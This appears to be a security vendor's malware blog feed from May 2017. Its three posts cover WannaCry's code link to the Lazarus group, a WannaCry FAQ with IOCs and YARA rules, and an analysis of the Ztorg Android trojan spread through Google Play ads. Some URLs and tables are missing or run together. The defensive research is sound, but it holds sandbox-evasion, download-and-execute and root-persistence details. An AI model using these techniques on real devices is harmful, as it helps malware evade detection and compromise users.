Malware RSS Feed

WannaCry and Lazarus Group – the missing link?

Malware Alerts - Mon, 05/15/2017 - 15:32

Moments ago, Neel Mehta, a researcher at Google posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact refers to similarity between samples that have shared code between themselves. The two samples Neel refers to post are:

  • A WannaCry cryptor sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with similar code highlighted:

So, what does it all mean?

I know about Wannacry, but what is Lazarus?

We wrote about the Lazarus group extensively and presented together with our colleagues from BAE and SWIFT at the Kaspersky Security Analyst Summit (SAS 2017). See:

Among other things, the Lazarus group was responsible for the Sony Wiper attack, the Bangladesh bank heist and the DarkSeoul operation.

We believe Lazarus is not just “yet another APT actor”. The scale of the Lazarus operations is shocking. The group has been very active since 2011 and was originally disclosed when Novetta published the results of its Operation Blockbuster research. During that research, which we also participated in, hundreds of samples were collected and show that Lazarus is operating a malware factory that produces new samples via multiple independent conveyors.

Is it possible this is a false flag?

In theory anything is possible, considering the 2015 backdoor code might have been copied by the Wannacry sample from February 2017. However, this code appears to have been removed from later versions. The February 2017 sample appears to be a very early variant of the Wannacry encryptor. We believe a theory a false flag although possible, is improbable.

What conclusions can we make?

For now, more research is required into older versions of Wannacry. We believe this might hold the key to solve some of the mysteries around this attack. One thing is for sure — Neel Mehta’s discovery is the most significant clue to date regarding the origins of Wannacry.

Are we sure the early February variant is the precursor to the later attacks?

Yes, it shares the same the list file extension targets for encryption but, in the May 2017 versions, more extensions were added:

> .accdb
> .asm
> .backup
> .bat
> .bz2
> .cmd
> .der
> .djvu
> .dwg
> .iso
> .onetoc2
> .pfx
> .ps1
> .sldm
> .sldx
> .snt
> .sti
> .svg
> .sxi
> .vbs
> .vcd

They also removed an older extension: “.tar.bz2” and replaced it with just “.bz2”
We strongly believe the February 2017 sample was compiled by the same people, or by people with access to the same sourcecode as the May 2017 Wannacry encryptor used in the May 11th wave of attacks.

So. Now what?

We believe it’s important that researchers around the world investigate these similarities and attempt to discover more facts about the origin of Wannacry. Looking back to the Bangladesh attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to links them together with high confidence. Further research can be crucial to connecting the dots.

Has anyone else confirmed this?

Yes, Matt Suiche from Comae Technologies confirmed the same similarity based on Neel’s samples:

Can you share the YARA rule used to find this?

Yes, of course. Here you go:

rule lazaruswannacry {


description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
date = "2017-05-15"
reference = ""
author = "Costin G. Raiu, Kaspersky Lab"
version = "1.0"
hash = "9c7c7149387a1c79679a87dd1ba755bc"
hash = "ac21c8ad899727137c4b94458d7aa8d8"


51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
46 56 E8

03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
2B C0 2C C0 FF FE


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and all of them }

WannaCry FAQ: What you need to know today

Malware Alerts - Mon, 05/15/2017 - 13:06

Friday May 12th marked the start of the dizzying madness that has been ‘WannaCry’, the largest ransomware infection in history. Defenders have been running around with their heads on fire trying to get ahead of the infection and to understand the malware’s capabilities. In the process, a lot of wires have gotten crossed and we figured it’s time to sit down and set the record straight on what we know, what we wish we knew, and what the near future might hold for us going forward.

In the interest of standing by our stated mission, ‘We’re Here to Save the World’, we’re also sharing IOCs and Yara rules below.

Please remember: Patch, Patch, Patch!

For a refresher on the weekend of madness, please see our original blog.

How did it all start? Was there an e-mail attack vector? Phishing link?

To date, we could not find an e-mail attack vector for Wannacry. We are still investigating leads that suggest compromised sites were used to target some customers. So far, we can confirm that our users are getting attacked using an implementation of the famous EternalBlue exploit leaked by the Shadowbrokers in April. The exploit installs the DarkPulsar backdoor, which is further leveraged to infect a system. Even if the EternalBlue exploit fails in the first place, the attack code still tries to leverage the DarkPulsar backdoor which might have been installed in a previous attack.

Perhaps the main reason why Wannacry was so successful is the fact that the EternalBlue exploit works over the Internet without requiring any user interaction. It works on top of TCP port 445. Last week, our internet facing sensors registered an uptick in port 445 connections on Thursday May 11th, one day before the major outbreak noted on Friday. This means it’s possible the worm was released on Thursday, possibly even late Wednesday evening. The uptick in Port 445 traffic is also confirmed by the SANS DShield project’s graphics.

Port 445 connections per day

I’ve seen conflicting reports about the exploit. Is it targeting SMBv1 or SMBv2?

The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection; however, while disabling SMBv1 (an old protocol) has no significant impact on modern systems, disabling SMBv2 can cause problems. This is why it is highly recommended to disable SMBv1 for the current attack and for the future.

What is the killswitch? Can we rely on it?

The worm-spreading part of the Wannacry – which is designed to infect other computers — has a special check at the beginning. It tries to connect to a hardcoded website on the Internet and if the connection FAILS, it continues with the attack. If the connection WORKS, it exits. Thus, by registering this domain and pointing it to a sinkhole server, a researcher from the U.K. successfully slowed the spread of the worm.

Can we ultimately rely on this? Well, there has been a lot of speculation about the effectiveness of this killswitch. On the one hand, it does stop further spread of the infection. However, only if the worm is able to connect to the Internet. Many corporate networks have firewalls blocking internet connections unless a proxy is used. For these, the worm will continue to spread in the local network. On the other hand, there is nothing stopping the attackers from releasing a new variant that does not implement a killswitch.

Why did the attackers add a killswitch in the first place?

This is a very good question. Some possible explanations:

  • They were afraid the attack might get out of control and wanted a way to stop the propagation.
  • They coded it as an anti-sandbox check (some sandboxes emulate all internet connections and make them appear to work even if they do not exist)
Has this attack been contained?

We started tracking the attack early today to determine if it’s spiking again. Since 06.00 UTC/GMT Monday 15th May, we observed a sixfold decrease in attacks across our customer base than during the first hours on Friday May 12th.

This suggests infections based on current variants may be under control.

Wait, what do you mean by “current variants”? Is there a second wave of attacks?

Over the weekend two notable variants emerged. Kaspersky Lab does not believe any of these variants were created by the original authors –they were most likely patched by others keen to exploit the attack separately and independently.

The first one started spreading on Sunday morning, at around 02.00 UTC/GMT and was patched to connect to a different domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com). Kaspersky Lab has so far noted three victims for this variant, located in Russia and Brazil.

Code patch from d724d8cc6420f06e8a48752f0da11c66

The second variation that appeared during the weekend appears to have been patched to remove the killswitch. This variant does not appear to be spreading, possibly due to a bug.

Sample MD5 In the wild Killswitch present? Domain killswitch d5dcd28612f4d6ffca0cfeaefd606bcf Yes Yes ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com d724d8cc6420f06e8a48752f0da11c66 No No n/a Does the second wave contain the killswitch?

The d5dcd28612f4d6ffca0cfeaefd606bcf sample distributed on Sunday night (first reports around 02:00am UTC) contains a killswitch domain. This domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) is only two bytes different from the original:

Sample MD5 Killswitch domain Old iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com New (see above) ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The second domain was sinkholed by Matt Suiche of Comae Technologies, who reported stopping about 10,000 infections from spreading further:

How much money has been paid by victims so far?

WannaCry Wallet Tracker as of Monday May 15th.

Multiple attempts have been made at tracking transactions to known bitcoin wallets used by WannaCry. The tracker ‘’ has the latest count (at the time of writing) at upwards of 31BTC, or close to $55,000 USD.

What will the attackers do with the money?

An Evil Lair?

We believe it’s unlikely the attackers will be able to do anything with the bitcoins, considering the current high level of interest in this story. Even though the wallet owners are anonymous, the transactions are visible to everybody and can be tracked. Once the bitcoins reach a payment point, where the attackers use them to purchase something in the real world, that payment can be tracked to shipment details, services, or other IPs, effectively, increasing the chances of getting caught.

Does payment guarantee the recovery of files?

We don’t know. Since we are dealing with criminals, there is no reason to expect them to honor the deal, especially in a situation where all the world is closely tracking this campaign and disrupting it as much as possible. Paying the ransom amounts to funding the next wave.

Do not pay the ransom.

How does the worm spread inside a local corporate network?

The malware includes a worm functionality that tries to infect other unpatched Windows machines inside the local network, generating large SMB traffic. Basically it scans LAN IPS for SMB/445 port open. Where it finds any, it delivers the EternalBlue exploit.

Have any other exploits been used?

The only exploit observed so far being used in this campaign is the EternalBlue exploit leaked by Shadow Brokers.

Interestingly, once the malware infects a computer, it runs shellcode to drop and execute its payload. The payload code is available for both 32- and 64-bit systems, runs in ring-0, and seems to be based on the DoublePulsar backdoor leaked by Shadow Brokers in their ‘Lost in Translation‘ blog post .

Can you explain what happens for victims behind a proxy?

The killswitch prevented the main strain of the malware from encrypting the files in the infected computers, basically by checking if a given domain was registered or not. However WannaCry does not check for the presence of any proxy, so it is likely that samples running inside of an organization will not be able to reach the killswitch domain, even if it’s already registered. That means their files will continue to be encrypted.

Who is behind the attack? Is it just one group or multiple groups of attackers?

The attackers didn’t leave many clues about their identities or whereabouts. We are still investigating several possible leads and we’re sharing all relevant information with law enforcement.
At the moment, we haven’t seen any indicators that point towards any known groups. Some early variants of the Wannacry ransomware seem to have been used in March 2017, maybe some as early as February 2017. We are still researching these early variants, scraping them for clues.

Is this primarily targeting Russians?

The spread of the worm does not target a specific geolocation. The distribution is random, selecting IPs from the internet and affected local networks. Nevertheless, a large amount of the infections are in Russia, about 66% of the total attacks we have seen. The skew in distribution is likely due a combination of our increased visibility into Russia as well as a likely prevalence of unpatched systems.

Are you working with law enforcement to help contain this attack?

Yes, we are working with several law enforcement agencies and have provided them with information to help mitigate the attack.

Microsoft is warning against governments stockpiling cyberweapons and called for a Digital Geneva Convention. Will this help?

Kaspersky Lab supports Brad Smith’s call-to-action for governments and industries around the world to take critically important steps to help make a better digital future for all. We strongly believes the world needs an international digital convention and support with the creation of a neutral international cyber organization and firmly supports a pledge from companies to not conduct offensive cyber activities and protect their users from all cyberattacks. For more details please see:

What should I do right now to make sure my organization is protected?

Our recommendations:

  • Install the MS Security Bulletin patches for MS17-010. Please note that Microsoft also released an emergency patch for Windows XP, which is out of support!
  • Disable SMBv1.
  • Backup your data on a regular basis and be sure to store the backups offline.
  • Limit administrative privileges in the network.
  • Segment your network.
  • Make sure all nodes have security software installed and updated.
  • Kaspersky users: make sure System Watcher is enabled and the software updated. System watcher will ensure rollback of any encrypted files.
  • For those who do not use Kaspersky Lab solutions, we suggest installing the free Kaspersky Anti-Ransomware Tool for business (KART).
  • WannaCry is also targeting embedded systems. We recommend ensuring that dedicated security solutions for embedded systems are installed, and that they have both anti-malware protection and Default Deny functionality enabled.
Did Kaspersky block the attack for every target that had the software installed?

Our recent products include a module named System Watcher, which is designed to stop ransomware attacks. It was successful in blocking the damage from Wannacry, proving once again its effectiveness. Additionally, our products include specific detection subroutines which stopped the spreading of the attacks inside local networks. Since Saturday, our products also blocked the network level attacks through IDS components.

I’m running Windows XP – how can I protect myself?

First of all, stop running Windows XP. It is a 16-year-old operating system which is no longer officially supported by Microsoft. We recommend you upgrade to Windows 8.1 or 10. If you absolutely need to run Windows XP, you can download the emergency patch from Microsoft here:

However, prepare for a rough ride ahead, as other vulnerabilities will most likely remain open and leave you vulnerable in the future to other attacks.

Do you have YARA rules and IOCs for everything we know so far?

Multiple YARA rules have been released so far, with varying degrees of accuracy. Florian Roth has published a good Wannacry YARA set on his GitHub. Another set of YARA rules has been published by US-CERT, however, they produce false positives and are not recommended at this time. Our own YARA rules can be found below.

Indicators of Compromise

Network traffic to the following hosts:

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
  • ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Filenames on disk:

  • mssecsvc.exe
  • taskdl.exe
  • taskse.exe
  • wannacry.exe
  • tasksche.exe

Hashes for the variants with different kill switches:

  • d5dcd28612f4d6ffca0cfeaefd606bcf
  • d724d8cc6420f06e8a48752f0da11c66

For more malware hashes, please see our previous blogpost.

Yara rules

rule crimeware_Wannacry_worm {


description = "Find Wannacry worm carrier samples"
date = "2017-05-14"
version = "1.0"
author = "Kaspersky Lab"
tlp = "GREEN"


$a0="__TREEID__PLACEHOLDER__" ascii wide fullword
$a1="__USERID__PLACEHOLDER__" ascii wide fullword
$a2="userid" ascii wide fullword
$a3="treeid" ascii wide fullword
$a4="__TREEPATH_REPLACE__" ascii wide fullword
$a5="\\\\%s\\IPC$" ascii wide fullword
$a6="Microsoft Base Cryptographic Provider v1.0" ascii wide fullword
$a7="mssecsvc2.0" ascii wide fullword
$a8="Microsoft Security Center (2.0) Service" ascii wide fullword
$a9="%s -m security" ascii wide fullword
$a10="C:\\%s\\qeriuwjhrf" ascii wide fullword
$a11="tasksche.exe" ascii wide fullword


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and (8 of ($a*)) }
rule crimeware_Wannacry_ransomware {


description = "Find Wannacry ransomware module"
date = "2017-05-14"
version = "1.1"
author = "Kaspersky Lab"
tlp = "GREEN"


//list of extensions targeted by the ransomware module
2E 00 64 00 65 00 72 00 00 00 00 00 2E 00 70 00
66 00 78 00 00 00 00 00 2E 00 6B 00 65 00 79 00
00 00 00 00 2E 00 63 00 72 00 74 00 00 00 00 00
2E 00 63 00 73 00 72 00 00 00 00 00 2E 00 70 00
31 00 32 00 00 00 00 00 2E 00 70 00 65 00 6D 00
00 00 00 00 2E 00 6F 00 64 00 74 00 00 00 00 00
2E 00 6F 00 74 00 74 00 00 00 00 00 2E 00 73 00
78 00 77 00 00 00 00 00 2E 00 73 00 74 00 77 00
00 00 00 00 2E 00 75 00 6F 00 74 00 00 00 00 00
2E 00 33 00 64 00 73 00 00 00 00 00 2E 00 6D 00
61 00 78 00 00 00 00 00 2E 00 33 00 64 00 6D 00
00 00 00 00 2E 00 6F 00 64 00 73 00 00 00 00 00
2E 00 6F 00 74 00 73 00 00 00 00 00 2E 00 73 00
78 00 63 00 00 00 00 00 2E 00 73 00 74 00 63 00
00 00 00 00 2E 00 64 00 69 00 66 00 00 00 00 00
2E 00 73 00 6C 00 6B 00 00 00 00 00 2E 00 77 00
62 00 32 00 00 00 00 00 2E 00 6F 00 64 00 70 00
00 00 00 00 2E 00 6F 00 74 00 70 00 00 00 00 00
2E 00 73 00 78 00 64 00 00 00 00 00 2E 00 73 00
74 00 64 00 00 00 00 00 2E 00 75 00 6F 00 70 00
00 00 00 00 2E 00 6F 00 64 00 67 00 00 00 00 00
2E 00 6F 00 74 00 67 00 00 00 00 00 2E 00 73 00
78 00 6D 00 00 00 00 00 2E 00 6D 00 6D 00 6C 00
00 00 00 00 2E 00 6C 00 61 00 79 00 00 00 00 00
2E 00 6C 00 61 00 79 00 36 00 00 00 2E 00 61 00
73 00 63 00 00 00 00 00 2E 00 73 00 71 00 6C 00
69 00 74 00 65 00 33 00 00 00 00 00 2E 00 73 00
71 00 6C 00 69 00 74 00 65 00 64 00 62 00 00 00
2E 00 73 00 71 00 6C 00 00 00 00 00 2E 00 61 00
63 00 63 00 64 00 62 00 00 00 00 00 2E 00 6D 00
64 00 62 00 00 00 00 00 2E 00 64 00 62 00 00 00
2E 00 64 00 62 00 66 00 00 00 00 00 2E 00 6F 00
64 00 62 00 00 00 00 00 2E 00 66 00 72 00 6D 00
00 00 00 00 2E 00 6D 00 79 00 64 00 00 00 00 00
2E 00 6D 00 79 00 69 00 00 00 00 00 2E 00 69 00
62 00 64 00 00 00 00 00 2E 00 6D 00 64 00 66 00
00 00 00 00 2E 00 6C 00 64 00 66 00 00 00 00 00
2E 00 73 00 6C 00 6E 00 00 00 00 00 2E 00 73 00
75 00 6F 00 00 00 00 00 2E 00 63 00 73 00 00 00
2E 00 63 00 00 00 00 00 2E 00 63 00 70 00 70 00
00 00 00 00 2E 00 70 00 61 00 73 00 00 00 00 00
2E 00 68 00 00 00 00 00 2E 00 61 00 73 00 6D 00
00 00 00 00 2E 00 6A 00 73 00 00 00 2E 00 63 00
6D 00 64 00 00 00 00 00 2E 00 62 00 61 00 74 00
00 00 00 00 2E 00 70 00 73 00 31 00 00 00 00 00
2E 00 76 00 62 00 73 00 00 00 00 00 2E 00 76 00
62 00 00 00 2E 00 70 00 6C 00 00 00 2E 00 64 00
69 00 70 00 00 00 00 00 2E 00 64 00 63 00 68 00
00 00 00 00 2E 00 73 00 63 00 68 00 00 00 00 00
2E 00 62 00 72 00 64 00 00 00 00 00 2E 00 6A 00
73 00 70 00 00 00 00 00 2E 00 70 00 68 00 70 00
00 00 00 00 2E 00 61 00 73 00 70 00 00 00 00 00
2E 00 72 00 62 00 00 00 2E 00 6A 00 61 00 76 00
61 00 00 00 2E 00 6A 00 61 00 72 00 00 00 00 00
2E 00 63 00 6C 00 61 00 73 00 73 00 00 00 00 00
2E 00 73 00 68 00 00 00 2E 00 6D 00 70 00 33 00
00 00 00 00 2E 00 77 00 61 00 76 00 00 00 00 00
2E 00 73 00 77 00 66 00 00 00 00 00 2E 00 66 00
6C 00 61 00 00 00 00 00 2E 00 77 00 6D 00 76 00
00 00 00 00 2E 00 6D 00 70 00 67 00 00 00 00 00
2E 00 76 00 6F 00 62 00 00 00 00 00 2E 00 6D 00
70 00 65 00 67 00 00 00 2E 00 61 00 73 00 66 00
00 00 00 00 2E 00 61 00 76 00 69 00 00 00 00 00
2E 00 6D 00 6F 00 76 00 00 00 00 00 2E 00 6D 00
70 00 34 00 00 00 00 00 2E 00 33 00 67 00 70 00
00 00 00 00 2E 00 6D 00 6B 00 76 00 00 00 00 00
2E 00 33 00 67 00 32 00 00 00 00 00 2E 00 66 00
6C 00 76 00 00 00 00 00 2E 00 77 00 6D 00 61 00
00 00 00 00 2E 00 6D 00 69 00 64 00 00 00 00 00
2E 00 6D 00 33 00 75 00 00 00 00 00 2E 00 6D 00
34 00 75 00 00 00 00 00 2E 00 64 00 6A 00 76 00
75 00 00 00 2E 00 73 00 76 00 67 00 00 00 00 00
2E 00 61 00 69 00 00 00 2E 00 70 00 73 00 64 00
00 00 00 00 2E 00 6E 00 65 00 66 00 00 00 00 00
2E 00 74 00 69 00 66 00 66 00 00 00 2E 00 74 00
69 00 66 00 00 00 00 00 2E 00 63 00 67 00 6D 00
00 00 00 00 2E 00 72 00 61 00 77 00 00 00 00 00
2E 00 67 00 69 00 66 00 00 00 00 00 2E 00 70 00


((uint16(0) == 0x5A4D)) and (filesize < 15000000) and any of them }

Ztorg: money for infecting your smartphone

Malware Alerts - Mon, 05/15/2017 - 04:57

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.


These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.


There were lots of comments saying that people downloaded these apps for credits/coins/etc.

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:



And of course they offered malware too:

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.


So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

  1. App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually and

  2. After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to or These URLs are related to the ads too.

  3. Then it redirects to

  4. And the final URL that leads to the Google Play Store was

All the offers that I was able to dump had and is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from look like this:|1002009&install_callback=

This URL structure (offer_id=..&aff_id=..&campaign=..) is related to the OffersLook tracking system. It contains many interesting things, like offer id, affiliate id. But it turns out that cybercriminals use different values for them, making these parameters unusable for us. Except one – install_callback. This parameter contains the name of the ad service.

While searching for I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that used the IP The same IP was used by, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, (which wasn’t mentioned in the report) was moved to a new IP –

Ad modules

Luckily I was able to find not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server

The user sees a list of advertised apps:

After the user clicks on the ads, they are redirected to the Google Play Store.

In this case, the redirects look like this: ->> -> -> -> ->

After analyzing ad campaigns containing, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources callbacks

Yeahmobi ( 41% Mobvista ( 34% Avazu ( 18% Supersonicads ( 7%

However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi-> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:









I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder’s name Type Detection %* DownloadProvider Malware 81% TF47HV2VFKD9 Malware 56% snowfoxcr AdWare 51% nativedroid Malware 48% .walkfree AdWare 33% ceroa AdWare 20% sysAndroid Malware 16% .googleplay_download Malware 15%

* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

com.equalizer.goods.listener com.ele.wall.papers com.voice.equalizer.musicssss com.amusing.notes.done

When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

  1. trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

  2. liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

  3. nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.


Every infected app from Google Play with this type of malicious module was protected by the packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. Malicious code will be triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events. It means that malicious code only starts executing after the user installs/updates/removes an app.

As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C ( and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.


Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.


The library will decode this answer and xor it with a 0x66 key.



g_class_name = b.a.b.a

g_method_name = b

g_url =

g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.


In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called is xored with 0x12 and then loaded using the ClassLoad method.

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains and, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/ file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools File name Tool name MD5 data/files/.zog/.a chattr 9CAE8D66BE1103D737676DBE713B4E52 data/files/.zog/.a chattr 1E42373FA7B9339C6C0A2472665BF9D4 data/files/.zog/supolicy supolicy cdceafedf1b3c1d106567d9ff969327a data/files/.zog/busybox busybox 3bc5b9386c192d77658d08fe7b8e704f data/files/.zog/.j Patched su 8fb60d98bef73726d4794c2fc28cd900 Exploits, exploit packs, exploit droppers File Name Name MD5 Detection name data/files/.Ag/Agcr Agcr32 D484A52CFB0416CE5294BF1AC9346B96 data/files/.Ag/Agcr Agcr64 B111DD21FD4FCEFDC8268327801E55CE data/files/.zog/.ag/bx Bx 70EBFA94C958E6E6A7C6B8CD61B71054 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/cx cx 892E033DA182C06794F2B295377B8A65 Exploit.AndroidOS.Lotoor.bu data/files/.zog/exp exp 6E17234C57308012911C077A376538DC data/files/.zog/.ag/ maink.apk/boy ab9202ccfdd31e685475ba895d1af351 script data/files/.zog/.ag/ maink.apk/bx 70ebfa94c958e6e6a7c6b8cd61b71054 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/ym ym32 F973BAA67B170AB52C4DF54623ECF8B3 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/ym ym64 807A6CF3857012E41858A5EA8FBA1BEF Exploit.AndroidOS.Lotoor.bu data/files/.zog/.aa mainp.apk/r1 c27e59f0f943cf7cc2020bda7efb442a data/files/.zog/.aa mainp.apk/r2 368df668d4b62bdbb73218dd1f470828 data/files/.zog/.aa mainp.apk/r3 fb8449d1142a796ab1c8c1b85c7f6569 data/files/.zog/.aa mainp.apk/r4 04dd488783dffcfd0fa9bbac00dbf0f9 Exploit.Linux.Enoket.a data/files/.zog/.ad mainmtk.apk b4b805dc90fa06c9c7e7cce3ab6cd252 data/files/.zog/.ag/np np 1740ae0dc078ff44d9f229dccbd9bf61 Exploit.Linux.Enoket.a

Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

